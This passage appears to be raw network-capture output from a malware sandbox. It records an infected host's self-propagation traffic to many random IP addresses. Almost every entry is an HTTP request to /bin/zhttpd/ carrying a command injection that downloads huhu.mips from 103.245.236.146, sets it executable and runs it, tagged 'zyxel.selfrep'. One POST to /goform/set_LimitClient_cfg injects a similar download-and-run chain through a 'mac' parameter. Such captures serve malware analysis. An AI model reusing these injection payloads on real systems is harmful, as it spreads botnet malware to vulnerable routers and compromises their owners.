                                                  Jan 19, 2024 18:23:44.827991962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1857192.168.2.133658870.69.61.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828008890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1858192.168.2.133668089.46.121.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828044891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1859192.168.2.133710654.245.172.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828083992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1860192.168.2.134808640.212.216.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828110933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1861192.168.2.1340516114.21.166.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828133106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1862192.168.2.1338692122.220.65.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828150988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1863192.168.2.1347572216.69.208.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828206062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1864192.168.2.133497689.18.195.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828248978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1865192.168.2.1349060166.240.116.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828284025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1866192.168.2.1360832186.39.234.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828331947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1867192.168.2.133691093.129.157.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828377008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1868192.168.2.1359728183.221.47.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828408957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1869192.168.2.1360510131.117.191.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828435898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1870192.168.2.135909268.80.182.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828494072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1871192.168.2.135653844.244.123.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.828542948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1872192.168.2.133523870.75.218.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832077026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1873192.168.2.1336488121.188.214.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832113981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1874192.168.2.1340468102.48.163.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832154036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1875192.168.2.133487092.253.79.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832165956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1876192.168.2.134379683.230.207.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832217932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1877192.168.2.133900212.193.160.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832258940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1878192.168.2.1348610179.186.252.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832278967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1879192.168.2.1343184121.6.163.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832334042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1880192.168.2.134880299.75.126.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832381964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1881192.168.2.1339834167.65.252.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832406998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1882192.168.2.135456094.156.249.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832433939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1883192.168.2.1341282178.120.49.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832467079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1884192.168.2.135060052.155.148.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.832501888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1885192.168.2.135990038.153.247.628080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.620820999 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:45.754040003 CET1286INHTTP/1.1 400 Bad Request
                                                  Server: squid/3.5.20
                                                  Mime-Version: 1.0
                                                  Date: Fri, 19 Jan 2024 17:23:45 GMT
                                                  Content-Type: text/html;charset=utf-8
                                                  Content-Length: 3468
                                                  X-Squid-Error: ERR_INVALID_URL 0
                                                  Connection: close
                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                  Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1886192.168.2.133897494.100.133.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.841794014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1887192.168.2.1349366118.248.163.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.841862917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1888192.168.2.135583454.159.152.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.841917038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1889192.168.2.1357122132.164.41.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.841948986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1890192.168.2.1341054134.133.16.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.841989994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1891192.168.2.1358678100.4.154.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842045069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1892192.168.2.135612884.9.103.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842083931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1893192.168.2.135024638.44.164.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842108011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1894192.168.2.1344534182.151.120.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842176914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1895192.168.2.1349416147.132.1.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842216969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1896192.168.2.135946420.55.51.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842246056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1897192.168.2.1339950115.94.116.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842278004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1898192.168.2.1343546150.58.142.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842314959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1899192.168.2.135451017.121.24.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842363119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1900192.168.2.134212245.62.210.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842411995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1901192.168.2.1343282106.243.131.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842461109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1902192.168.2.136081218.155.170.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842519045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1903192.168.2.1339774148.188.103.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842552900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1904192.168.2.1350974176.66.158.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842607975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1905192.168.2.1352224145.50.226.7443
